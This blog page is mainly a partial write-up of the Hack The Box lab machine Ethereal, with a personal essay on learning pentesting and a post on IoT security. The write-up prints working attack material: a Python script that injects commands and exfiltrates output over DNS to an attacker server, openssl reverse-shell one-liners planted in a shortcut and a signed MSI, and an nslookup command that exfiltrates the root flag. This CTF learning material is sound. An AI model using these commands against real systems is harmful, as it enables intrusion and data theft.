Ethereal @ hackthebox: Certificate-Related Rabbit Holes

This post is related to the ‘insanely’ difficult hackthebox machine Ethereal that was recently retired. Beware – It is not at all a full comprehensive write-up! I zoom in on openssl, X.509 certificates, signing stuff, and related unnecessary rabbit holes that were particularly interesting to me – as somebody who recently described herself as a Dinosaur that supports some legacy (Windows) Public Key Infrastructures, like the Cobol Programmers tackling Y2K bugs.

Ethereal was insane, because it was so locked down. You got limited remote command execution by exfiltrating the output of commands over DNS, via a ‘ping’ web tool with a command injection vulnerability. In order to use that tool you had to find credentials in a password box database that was hidden in an image of a DOS floppy disk buried in other files on an FTP server. See excellent full write-ups by 0xdf and by Bernie Lim, or watch ippsec’s video.

Regarding the DNS data exfiltration I owe to this m0noc’s great video tutorial. You parse the output of the command in a for loop, and exfil data in chunks that make up a ‘host name’ sent to your evil DNS server. I am embedding my RCE script below.

openssl – telnet-style

To obtain a reverse shell and to transfer files, you had to use openssl ‘creatively’ –  as a telnet replacement, running a ‘double shell’ with different windows for stdin and stdout.

In order to trigger this shell as ‘the’ user- the one with the flag, named jorge, you needed to overwrite an existing Windows shortcut file pointing to the Visual Studio 2017 executable (.LNK). I created ‘malicious’ shortcuts using the python library pylnk, on a Windows system. The folder containing that file was also the only place at all you could write to the file system as the initial ‘web injection user’, alan. I noticed that the overwritten LNK was replaced quickly, at least every minute – so I also hoped that a simulated user will ‘click’ the file every minute.

Creating certificate and key …

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Listening on the only ports open for outgoing traffic with two ‘SSL servers’:

openssl s_server -key key.pem -cert cert.pem -port 73
openssl s_server -key key.pem -cert cert.pem -port 136

The Reverse shell command to be used in the LNK file uses the ‘SSL client’:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd 2>&1 | C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -connect 10.10.14.19:73 2>&1 &"

The first rabbit hole I fell into was that I used openssl more ‘creatively’ than what was maybe needed. Though I found this metasploit module with a double telnet-style shell for Linux I decided to work on replacing the LNK first, and only go for a reverse shell if a simple payload in the LNK would work.

Downside of that approach: I needed another way of transferring the LNK file! If I had the reverse shell, already I’d been be able to use ‘half of it’ for transferring a file in the spirit of nc.

1) Run a ‘SSL server’ locally to be prepared for sending the file:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73 <to_be_copied

2) Receive it using the SSL client:

openssl.exe s_client -quiet -connect 10.10.14.19:73 >to_be_copied

The usual ways to transfer files were blocked, for example certutil. certutil and certreq are the tools that are sort of an equivalent of openssl on Windows. certutil’s legit purpose is to manage the Windows PKI, manage certificate stores, analzye certificates, publish to certificate stores, download certificate revocation lists, etc. … The latter option makes it a ‘hacker tool’ because it lets you download other files like wget or curl (depending on the version of Windows and Defender’s vigilance doing heuristic checks of the action performed, rather than on the EXE itself).

Nearly missing out on openssl

When I saw openssl – installed on Windows! – I hoped I was on to something! However, I nearly let go of openssl as I failed to test it properly. I  ran openssl help in my nslookup shell, and did not get any response. Nearly any interesting EXE was blocked on Ethereal, so it came not as a surprise that openssl seemed to be, too.

Only after I was stuck for quite a while and a kind soul gave me a nudge to not abandon openssl too fast, I realized that the openssl help output is actually sent to standard error, not standard out.

You can redirect stderr to stdout using 2>&1 – but if you run the command ’embedded’ in the for loop (see python script below), you better escape both special characters like this:

'C:\progra~2\openssl-v1.1.0\bin\openssl.exe help 2^>^&1'

File transfer with openssl base64 and echo

My solution was to base64 encode the file locally with openssl (rather than using base64, just ‘to play it safe’), to echo out the file in  the DNS shell as alan on Ethereal, then base64 decode it and store it in the final location. I had issues with echoing out the full content in one line, so I did not use the –A option in openssl base64, but echoed one line after the other.

I missed that I can write to the folder – I believed I could only write to this single LNK file. So I had to echo to the exact same file that I would also use as the final target, like so:

type target.lnk | openssl base64 -d -out target.lnk

Below is my final RCE script for a simple ‘shell’ – either executing input commands 1:1 or special (series of) commands using shortcuts. E.g. for ‘echo-uploading’ a file, decoding, and checking the result I used

F shell.lnk
decode
showdir

In case I wanted to run a command without having to worry about escaping I can also run it blind, without any output via nslookup.

Script rce.py

import requests
import readline
import os
import sys

url = 'http://ethereal.htb:8080/'
headers = { 'Authorization' : 'Basic YWxhbjohQzQxNG0xN3k1N3IxazNzNGc0MW4h' }

server_dns = '10.10.14.19'
A_dns = 'D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z.'
template = '127.0.0.1 & ( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
template_blind = '127.0.0.1 & _CMD_'
template_lnk = '( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
# CSRF protections not automated as they did not change that often
# Copy from Burp, curl etc.
postdata = { 
    '__VIEWSTATE' : '/wEPDwULLTE0OTYxODU3NjhkZG8se05Gp91AdhB+bS+3cb/nwM7/1XnvqTtUaEoqfbcF',
    '__VIEWSTATEGENERATOR' : 'CA0B0334',
    '__EVENTVALIDATION' : '/wEdAAMwTZWDrxbqRTSpQRwxTZI24CgZUgk3s462EToPmqUw3OKvLNdlnDJuHW3p+9jPAN/MZTRxLbqQfS//vLHaNSfR4/D4qt+Wcl4tw/wpixmG9w==',
    'ctl02' : ''
}

target_lnk = 'C:\Users\Public\Desktop\Shortcuts\Visual Studio 2017.lnk'
target_lnk_dos = 'C:\Users\Public\Desktop\Shortcuts\Visual~1.lnk'
target_dir = 'C:\Users\Public\Desktop\Shortcuts\\'

openssl_path = 'C:\progra~2\openssl-v1.1.0\\bin\openssl.exe'

ask = True

def create_echo(infile_name, outfile_path):
    
    # File name must not include blanks
    b64_name = infile_name + '.b64'

    echos = []

    if not os.path.isfile(infile_name):
        print 'Cannot read file!'
        return echos
    else:
        os.system('openssl base64 -in ' + infile_name + ' -out ' + b64_name)
        f = open(b64_name, 'r')
    
    i = 0
    for line in f:
        towrite = line[:-1]
        if i == 0:
            echos += [ 'cmd /c "echo ' + towrite + ' >' + outfile_path + '"' ] 
        else:
            echos += [ 'cmd /c "echo ' + towrite + ' >>' + outfile_path + '"' ] 
        print line[:-1]
        i += 1

    f.close()
    return echos

def payload(cmd):
    return template.replace('_CMD_', cmd)

def payload_blind(cmd):
    return template_blind.replace('_CMD_', cmd)

def send(payload):
    print payload
    print ''
    
    if ask == True:
       go = raw_input('Enter n for discarding the command >>: ')
    else:
       go = 'y'

    if go != 'n':
        postdata['search'] = payload
        response = requests.post(url, data=postdata, headers=(headers))
        print 'Status Code: ' + str(response.status_code)
    else:
        print 'Not sent: ' + cmd

while True:

    cmd = raw_input('\033[41m[dnsexfil_cmd]>>: \033[0m ')

    if cmd == 'quit': 
        break

    elif cmd == 'dontask':
        ask = False
        print 'ask set to: ' + str(ask)
    elif cmd == 'ask':
        ask = True
        print 'ask set to: ' + str(ask)

    elif cmd[0:2] == 'F ':
        infile = cmd[2:]
        echos = create_echo(infile, target_lnk_dos)
        link = ' & '
        cmd_all_echos = link.join(echos)
        send(payload_blind(cmd_all_echos))

    elif cmd[0:2] == 'B ':
        cmd_blind = cmd[2:]
        send(payload_blind(cmd_blind))
       
    elif cmd == 'decode':
        cmd = 'type "' + target_lnk + '" | ' + openssl_path + ' base64 -d -out "' + target_lnk + '"'
        send(payload_blind(cmd))

    elif cmd == 'showdir':
        cmd = 'dir ' + target_dir
        send(payload(cmd))

    elif cmd == 'showfile':
        cmd = 'type "' + target_lnk + '"'
        send(payload(cmd))

    else:
        send(payload(cmd))

Finding that elusive CA certificate

After I finally managed to run a shell as jorge I fell into lots of other rabbit holes – e.g. analyzing, modifying, and compiling a recent Visual Studio exploit.

Then I ran tasklist for the umpteenth time, and saw an msiexec process! And lo and behold, even my user jorge was able to run msiexec! This fact was actually not important, as I found out later that I should wait for another (admin) user to run something.

I researched ways to use an MSI for applocker bypass. As described in detail in other write-ups you could use a simple skeleton XML file to create your MSI with the WIX toolset. WIX was the perfect tool to play with at Christmas when I did this box – it’s made up of executables called light.exe, candle.exe, lit.exe, heat.exe, shine.exe, torch.exe, pyro.exe, dark.exe, melt.exe … 🙂

So I also created a simple MSI, ran it as jorge and nothing happened. Honestly, I cannot tell with hindsight if that should have possibly worked – just without any escalation to an admin or SYSTEM context – or I made an error again. But because of my focus on all things certificates and signatures, I suspected the MSI had to be signed – that would also be in line with the spirit of downlocking at this box.

Signed code does only run of the certificate is trusted. So I needed to sign the MSI either with a ‘universally’ / publicly trusted certificate (descending from a CA certified in the Microsoft Root Program) or there was possibly a key and certificate on the box I have not found yet. Both turned out to be another good chance for falling into rabbit roles!

Testing locally with certificates in the Windows store

I used one of my Windows test CAs and issued a Code Signing certificate, then used signtool to sign a test MSI. The reference to the correct store is in this case the CN of the Subject Name which should be unique in your store:

signtool sign /n Administrator /v pingtest.msi

The MSI could be ‘installed’ and my ping worked on a test Windows box. So I knew that the signing procedure worked, but I needed a certificate chain that Ethereal will trust. With hindsight, giving my false assumption that jorge will run the MSI, I should also have considered that jorge will install a Root CA certificate of my liking into his (user’s) Root certificate store. It should theoretically be doable fiddling with the registry only (see second hilarious rabbit hole below), but normally I would certutil for that. And certutil was definitely blocked.

Publicly trusted certificate

I do have one! Our Austrian health insurance smartcards have pre-deployed keys, and you can enroll for X.509 certificates for those keys. So on a typical Windows box, code signed with this ID card would run. But there is a catch: Windows does not – anymore, since Vista if I recall correctly – pre-populate the store with all the Root CAs certified by Microsoft. If you try to run a signed MSI (or visit an HTTPS website, or read a signed e-mail), then Windows will download the required root certificate as needed. But hackthebox machines are not able to access the internet.

Yet, in despair I tried, for the unlikely case all the roots were there. Using signtool like so, it will let me pick the smartcard certificate, and I was prompted for the PIN:

signtool sign /a /v pingtest.msi

So if my signed signed had screwed up the box, I could not have denied it – a use-case of the Non-Repudation Key Usage 😉

Uploaded my smartcard-signed MSI. And failed to run it.

Ages-old Demo CA – and how to use openssl for signing

There was actually a CA on the box, sort of – the demoCA that comes with the openssl installation. A default CA key and certificate comes with openssl, and the perl script CA.pl can be used to created ‘database-like files and folders’. In despair I used this default CA certificate and key – maybe it was was trusted as kind of subtle joke? I did not bother to look closely at the CA certificate – otherwise I should have noticed it had expired long ago 🙂

The process I tested for signing was the same I used later. As makecert is the tool that many others have used to solve this, I quickly sum up the openssl process.

You can either use the openssl ca ‘module’ – or openssl x509. The latter is a bit simpler as you do not need to prepare the CA’s ‘database’ directories.

Of course I used Windows GUI tools to create the request 🙂

  • Start, Run, certmgr.msc
  • Personal, All Tasks, Advanced Operations, Create Custom Request
  • Custom PKCS#10 Request.
  • Extensions:
    Key Usage = Digital Signature
    Extended Key Usage = Code Signing
  • Private Key, Key Options: 2048 Bit
  • BASE64 encoding

The result is a BASE64 encoded ‘PEM’ certificate signing request. You can sign with the demoCA’s key like this – I did this on my Windows box.

openssl x509 -req -in req.csr -CA cacert.pem -CAkey private\cakey.pem -CAcreateserial -out codesign.crt -days 500 -extfile codesign.cnf -extensions codesign

There are different ways to make sure that the Code Signing Extended Key Usage gets carried over from the request to the certificate, or that it is ‘added again’. In the openssl.cnf config file (default or referenced via -config) you can e.g. configure to copy_extensions.

In the example above, I used a separate file for extensions. (Values seem to be case-sensitive, also on Windows).

[ codesign ]

keyUsage=digitalSignature
extendedKeyUsage=codeSigning

To complete the process, the Root CA certificate is imported in the the Trusted Root Certification Authorities store in certmgr.msc,  and the Code Signing certificate is imported into Personal certificates in certmgr.msc. In case the little key icon does not show up, key and certificate have not been properly united, which can be fixed with

certutil -repairstore -user my [Serial Number of the cert]

The file is signed without issues, however the resulting chain violates basic requirements for certificate path validation: The CA’s end of life was in 1998.

certutil cacert.pem

X509 Certificate:
Version: 1
Serial Number: 04
Signature Algorithm:
Algorithm ObjectId: 1.2.840.113549.1.1.4 md5RSA
Algorithm Parameters:
05 00
Issuer:
CN=SSLeay/rsa test CA
S=QLD
C=AU
Name Hash(sha1): 4f28bdc33fb78c854e2ceb26210f981bb73ce9ea
Name Hash(md5): ee7084bbed50615d1e118ff2ada590cf

NotBefore: 10.10.1995 00:32
NotAfter: 06.07.1998 00:32

Subject:
CN=SSLeay demo server
OU=CS
O=Mincom Pty. Ltd.
S=QLD
C=AU

Weird way to find a CA certificate

This was – for me – the most hilarious part of owning this box. The mysterious Root CA had to be in the Windows registry, and I had no certutil. So I resorted to looking at the registry directly.

‘Windows Certificate stores’ are collections of different registry key, this was the one relevant here.

C:\>reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
....

But I wanted to look into the binary certificates with those keys so I dumped each of the keys (like 18F7C1FCC3090203FD5BAA2F861A754976C8DD25) and copied the contents from the terminal to a python script. This snippet shows only a single cert in the list:

certs = [
...
'190000000100000010000000E53D34CECB05C17EE332C749D78C02560F000000010000001000000065FC47520F66383962EC0B7B88A0821D03000000010000001400000018F7C1FCC3090203FD5BAA2F861A754976C8DD2509000000010000000C000000300A06082B060105050703080B000000010000003400000056006500720069005300690067006E002000540069006D00650020005300740061006D00700069006E00670020004300410000001400000001000000140000003EDF290CC1F5CC732CEB3D24E17E52DABD27E2F02000000001000000C0020000308202BC3082022502104A19D2388C82591CA55D735F155DDCA3300D06092A864886F70D010104050030819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E301E170D3937303531323030303030305A170D3034303130373233353935395A30819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E30819F300D06092A864886F70D010101050003818D0030818902818100D32E20F0687C2C2D2E811CB106B2A70BB7110D57DA53D875E3C9332AB2D4F6095B34F3E990FE090CD0DB1B5AB9CDE7F688B19DC08725EB7D5810736A78CB7115FDC658F629AB585E9604FD2D621158811CCA7194D522582FD5CC14058436BA94AAB44D4AE9EE3B22AD56997E219C6C86C04A47976AB4A636D5FC092DD3B4399B0203010001300D06092A864886F70D01010405000381810061550E3E7BC792127E11108E22CCD4B3132B5BE844E40B789EA47EF3A707721EE259EFCC84E389944CDB4E61EFB3A4FB463D50340B9F7056F68E2A7F17CEE563BF796907732EB095288AF5EDAAA9D25DCD0ACA10098FCEB3AF2896C479298492DCFFBA674248A69010E4BF61F89C53E593D1733FF8FD9D4F84AC55D1FD116363',
....
]
for cert in certs:
    print '======================================='
    print cert
    print '======================================='
    print cert.decode('hex')
    print '======================================='

OK, certainly not the most elegant way to deal with it, but I was loosing patience – I was on a war path!!

Strings in the output contain the CA’s Issuer and Subject Name, and most were familiar Microsoft, Versign, etc. With this exception:

=======================================
¬·╟<          òë┌┐ò$º¿Y╔&┌╢e½s╦π≥│τÇ╤#w▌╙o╠D       ╖è╔└eîqD╕ß!└öPδ⌠ ¡      ü¿M»╬Φv√tÄ.LgawĽ0ß       τ9╡ïε╢æï
  é0é010 U  My CA0é"0≥▀~àE~Γ<éíFj0
é ¥═p|ÉÉ▒ôfD╬,°á3╣Zƒ╕Cáφs╖Kεmìδ╗wFo2ßÄK ┘Xì╧Y?ÉR╢&,V┘Ω╠û5¬Σ▒┴Γ╧B·Gb4éτåi0Ku rí╕Oh≈φ¬u≤h¥J ┌┌º(┐Jk<√=-9{£H[▀ªP&«¢ΣU■2~ ½Öº-4║o/σ£oºå─∙Åédü¿éÅêr▐O.╘<'Qu∙w0~▒A±·â·{k
  é hòÿâ⌠╝*εC╡Åπs⌠╝[░╣±kπ{≥¬æ±¬╠b┐╤GëJ»i%┴       ╕ìiΦπ %¬*π[ò╗,9ü:╦-5  úV0T0 U  0  0A U :08ǽÖ┬ï]═8¬I¡X^⌠í010 U  My CAé÷h≥▀~àE~Γ<éíFj0

▀ó*┌û╞Qfè£ⁿ─;Lτ·II╫─╓┴¼╤N∩j Φ
)x═Mπ╪₧⌠ç╛ê┤YF:╛╢╙êDτσªM]Gá⌐ S≡∞Yg J»╪u

...

Maybe hard to spot, but there was a CA called My CA! But where was the key I needed to sign my own Code Signing cert?

In such cases, I typically resort to more Windows registry forensics. I hoped that ‘jorge’ or the box’ creators had touched a folder with these certificate and key. I walked through various Explorer-related keys, especially the infamous Shellbags:

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2
    NodeSlot    REG_DWORD    0x3
    MRUListEx    REG_BINARY    0100000000000000FFFFFFFF
    0    REG_BINARY    4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000
    1    REG_BINARY    5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1

… and I really saw a folder called Certs after decoding:

>>> print s.decode('hex')
n 1     µLGu VISUAL~1  V          ∩╛µLGuµLGu.   z¿                    åUÉ V i s u a l   S t u d i o   2 0 1 7   
>>> s='4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000'
>>> print s.decode('hex')
J 1     █L╓│ DEV 8        ∩╛█LÅ│█L╓│.   $                    Ö0e D E V   
>>> s='5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000'
>>> print s.decode('hex')
P 1     τLJ« Certs <      ∩╛τLA«τLJ«.   I.                    Ωτ╜ C e r t s    >>>

… and a link to a folder called MSIs:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder
    0    REG_BINARY    5000750062006C0069006300000060003200000000000000000000005075626C69632E6C6E6B0000460009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000005000750062006C00690063002E006C006E006B0000001A000000
    MRUListEx    REG_BINARY    020000000100000000000000FFFFFFFF
    1    REG_BINARY    4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000
...
>>> s='4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000'
>>> print s.decode('hex')
M S I s   Z 2           MSIs.lnk  B        ∩╛        .                             M S I s . l n k   
>>> 

Then I did what I should have done before – checking out the Recent Docs folder directly …

Directory of C:\Users\jorge\AppData\Roaming\Microsoft\Windows\Recent

07/07/2018  09:47 PM               405 EFS.lnk
07/07/2018  09:53 PM               555 MSIs.lnk
07/07/2018  09:53 PM               678 note.lnk
07/07/2018  09:49 PM               690 Public.lnk
07/09/2018  09:13 PM               612 system32.lnk
07/04/2018  09:17 PM               527 user.lnk

…. the file MSIs.link contained the path:

...
D:\DEV\MSIs
...

So there was a D: drive I had totally missed – and there you found a key MyCA.pvk and a certificate MyCA.cer.

The ‘funny’ thing now is that the LNK file hijacked before pointed to Visual Studio installed on the D: drive. So the intended way was likely to go straight to this folder, see certificates and and MSIs folder, and conclude you need to sign an MSI.

Signing that darn thing finally 🙂

I wanted to re-use the openssl process I tested before. But openssl cannot use PVK files (AFAIK 😉 but you can convert PVK keys to PFX (PKCS#12)

I ran

pvk2pfx /pvk MyCA.pvk /spc MyCA.cer

… to start a GUI certificate export wizard that let me specify the PFX password.

Then I converted the PFX key to PEM

openssl pkcs12 -in MyCA.pfx -out MyCA.pem -nodes

… and the binary (‘DER’) certificate to PEM

openssl x509 -inform der -in MyCA.cer -out MyCA.cer.pem

I signed a Code Signing certificate for a user with CN Test 1 (same process as with the demoCA), and used this to sign the final payload! Imported MyCA.cer to the Trusted Roots and referenced again the CN of the user in signtool:

signtool sign /n "Test 1" /v half_shell_MyCA.msi
The following certificate was selected:
    Issued to: Test 1
    Issued by: My CA
    Expires:   Sat May 09 14:54:50 2020
    SHA1 hash: 0CDBA139B0E93813969E9E82F1E739C962BA6A3B

Done Adding Additional Store
Successfully signed: half_shell_MyCA.msi

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0

I verified the MSI also with

signtool verify /pa /v half_shell_MyCA.msi

My final signed MSI payload was what I called a half shell, a command like this:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd &"

You can execute commands, but you do not get the output back. I tried to use my resources most efficiently.

A text note told us that the admin ‘rupal’ will test MSIs frequently. So I need one openssl listener – thus one of the two precious open ports – for waiting for rupal.

I used the other open port for uploading the MSI, ‘nc-style’ again with openssl.

But if I really wanted output from the blind half shell, I could also embed it in nslookup. So I used the rce.py to create this type of command (for that it has on option to just display but not run a command), that I would then paste into the input window of jorge’s half shell.

FOR /F "tokens=1-26" %a in ('copy half_shell_MyCA.msi D:\DEV\MSIs') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

And rupal called back!

\o/

But he also only half a shell, so I read root.txt via nslookup, pasting this command into his half shell:

FOR /F "tokens=1-26" %a in ('type C:\Users\rupal\Desktop\root.txt') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

What an adventure!

Ethereal-owned

Hacking

I am joining the ranks of self-proclaimed productivity experts: Do you feel distracted by social media? Do you feel that too much scrolling feeds transforms your mind – in a bad way? Solution: Go find an online platform that will put your mind in a different state. Go hacking on hackthebox.eu.

I have been hacking boxes over there for quite a while – and obsessively. I really wonder why I did not try to attack something much earlier. It’s funny as I have been into IT security for a long time – ‘infosec’ as it seems to be called now – but I was always a member of the Blue Team, a defender: Hardening Windows servers, building Public Key Infrastructures, always learning about attack vectors … but never really testing them extensively myself.

Earlier this year I was investigating the security of some things. They were black-boxes to me, and I figured I need to learn about some offensive tools finally – so I setup a Kali Linux machine. Then I searched for the best way to learn about these tools, I read articles and books about pentesting. But I had no idea if these ‘things’ were vulnerable at all, and where to start. So I figured: Maybe it is better to attack something made vulnerable intentionally? There are vulnerable web applications, and you can download vulnerable virtual machines … but then I remembered I saw posts about hackthebox some months ago:

As an individual, you can complete a simple challenge to prove your skills and then create an account, allowing you neto connect to our private network (HTB Labs) where several machines await for you to hack them.

Back then I had figured I will not pass this entry challenge nor hack any of these machines. It turned out otherwise, and it has been a very interesting experience so far -to learn about pentesting tools and methods on-the-fly. It has all been new, yet familiar in some sense.

Once I had been a so-called expert for certain technologies or products. But very often I became that expert by effectively reverse engineering the product a few days before I showed off that expertise. I had the exact same mindset and methods that are needed to attack the vulnerable applications of these boxes. I believe that in today’s world of interconnected systems, rapid technological change, [more buzz words here] every ‘subject matter expert’ is often actually reverse engineering – rather than applying knowledge acquired by proper training. I had certifications, too – but typically I never attended a course, but just took the exam after I had learned on the job.

On a few boxes I could use in-depth knowledge about protocols and technologies I had  long-term experience with, especially Active Directory and Kerberos. However, I did not find those boxes easier to own than the e.g. Linux boxes where everything was new to me. With Windows boxes I focussed too much on things I knew, and overlooked the obvious. On Linux I was just a humble learner – and it seemed this made me find the vulnerability or misconfiguration faster.

I felt like time-travelling back to when I started ‘in IT’, back in the late 1990s. Now I can hardly believe that I went directly from staff scientist in a national research center to down-to-earth freelance IT consultant – supporting small businesses. With hindsight, I knew so little both about business and about how IT / Windows / computers are actually used in the real world. I tried out things, I reverse engineered, I was humbled by what remains to be learned. But on the other hand, I was delighted by how many real-live problems – for whose solution people were eager to pay – can be solved pragmatically by knowing only 80%. Writing academic papers had felt more like aiming at 130% all of the time – but before you have to beg governmental entities to pay for it. Some academic colleagues were upset by my transition to the dark side, but I never saw this chasm: Experimental physics was about reverse engineering natural black-boxes – and sometimes about reverse engineering your predecessors enigmatic code. IT troubleshooting was about reverse engineering software. Theoretically it is all about logic and just zero’s and one’s, and you should be able to track down the developer who can explain that weird behavior. But in practice, as a freshly minted consultant without any ‘network’ you can hardly track down that developer in Redmond – so you make educated guesses and poke around the system.

I also noted eerie coincidences: In the months before being sucked into hackthebox’ back-hole, I had been catching up on Python, C/C++, and Powershell – for productive purposes, for building something. But all of that is very useful now, for using or modifying exploits. In addition I realize that my typical console applications for simulations and data analysis are quite similar ‘in spirit’ to typical exploitation tools. Last year I also learned about design patterns and best practices in object-oriented software development – and I was about to over-do it. Maybe it’s good to throw in some Cowboy Coding for good measure!

But above all, hacking boxes is simply addictive in a way that cannot be fully explained. It is like reading novels about mysteries and secret passages. Maybe this is what computer games are to some people. Some commentators say that machines on pentesting platforms are are more Capture-the-Flag-like (CTF) rather than real-world pentesting. It is true that some challenges have a ‘story line’ that takes you from one solved puzzle to the next one. To some extent a part of the challenge has to be fabricated as there are no real users to social engineer. But there are very real-world machines on hackthebox, e.g. requiring you to escalate one one object in a Windows domain to another.

And if you ever have seen what stuff is stored in clear text in the real world, or what passwords might be used ‘just for testing’ (and never changed) – then also the artificial guess-the-password challenges do not appear that unrealistic. I want to emphasize that I am not the one to make fun of weak test passwords and the like at all. More often than not I was the one whose job was to get something working / working again, under pressure. Sometimes it is not exactly easy to ‘get it working’ quickly, in an emergency, and at the same time considering all security implications of the ‘fix’ you have just applied – by thinking like an attacker. hackthebox is an excellent platform to learn that, so I cannot recommend it enough!

An article about hacking is not complete if it lacks a clichéd stock photo! I am searching for proper hacker’s attire now – this was my first find!

Internet of Things. Yet Another Gloomy Post.

Technically, I work with Things, as in the Internet of Things.

As outlined in Everything as a Service many formerly ‘dumb’ products – such as heating systems – become part of service offerings. A vital component of the new services is the technical connection of the Thing in your home to that Big Cloud. It seems every energy-related system has got its own Internet Gateway now: Our photovoltaic generator has one, our control unit has one, and the successor of our heat pump would have one, too. If vendors don’t bundle their offerings soon, we’ll end up with substantial electricity costs for powering a lot of separate gateways.

Experts have warned since years that the Internet of Things (IoT) comes with security challenges. Many Things’ owners still keep default or blank passwords, but the most impressive threat is my opinion is not hacking individual systems: Easily hacked things can be hijacked to serve as zombie clients in a botnet and lauch a joint Distributed Denial of Service attack against a single target. Recently the blog of renowned security reporter Brian Krebs has been taken down, most likely as an act of revenge by DDoSers (Crime is now offered as a service as well.). The attack – a tsunami of more than 600 Gbps – was described as one of the largest the internet had seen so far. Hosting provider OVH was subject to a record-breaking Tbps attack – launched via captured … [cue: hacker movie cliché] … cameras and digital video recorders on the internet.

I am about the millionth blogger ‘reporting’ on this, nothing new here. But the social media news about the DDoS attacks collided with another social media micro outrage  in my mind – about seemingly unrelated IT news: HP had to deal with not-so-positive reporting about its latest printer firmware changes and related policies –  when printers started to refuse to work with third-party cartridges. This seems to be a legal issue or has been presented as such, and I am not interested in that aspect here. What I find interesting is the clash of requirements: After the DDoS attacks many commentators said IoT vendors should be held accountable. They should be forced to update their stuff. On the other hand, end users should remain owners of the IT gadgets they have bought, so the vendor has no right to inflict any policies on them and restrict the usage of devices.

I can relate to both arguments. One of my main motivations ‘in renewable energy’ or ‘in home automation’ is to make users powerful and knowledgable owners of their systems. On the other hand I have been ‘in security’ for a long time. And chasing firmware for IoT devices can be tough for end users.

It is a challenge to walk the tightrope really gracefully here: A printer may be traditionally considered an item we own whereas the internet router provided by the telco is theirs. So we can tinker with the printer’s inner workings as much as we want but we must not touch the router and let the telco do their firmware updates. But old-school devices are given more ‘intelligence’ and need to be connected to the internet to provide additional services – like that printer that allows to print from your smartphone easily (Yes, but only if you register it at the printer manufacturer’s website before.). In addition, our home is not really our castle anymore. Our computers aren’t protected by the telco’s router / firmware all the time, but we work in different networks or in public places. All the Things we carry with us, someday smart wearable technology, will check in to different wireless and mobile networks – so their security bugs should better be fixed in time.

If IoT vendors should be held accountable and update their gadgets, they have to be given the option to do so. But if the device’s host tinkers with it, firmware upgrades might stall. In order to protect themselves from legal persecution, vendors need to state in contracts that they are determined to push security updates and you cannot interfere with it. Security can never be enforced by technology only – for a device located at the end user’s premises.

It is horrible scenario – and I am not sure if I refer to hacking or to proliferation of even more bureaucracy and over-regulation which should protect us from hacking but will add more hurdles for would-be start-ups that dare to sell hardware.

Theoretically a vendor should be able to separate the security-relevant features from nice-to-have updates. For example, in a similar way, in smart meters the functions used for metering (subject to metering law) should be separated from ‘features’ – the latter being subject to remote updates while the former must not. Sources told me that this is not an easy thing to achieve, at least not as easy as presented in the meters’ marketing brochure.

Linksys's Iconic Router

That iconic Linksys router – sold since more than 10 years (and a beloved test devices of mine). Still popular because you could use open source firmware. Something that new security policies might seek to prevent.

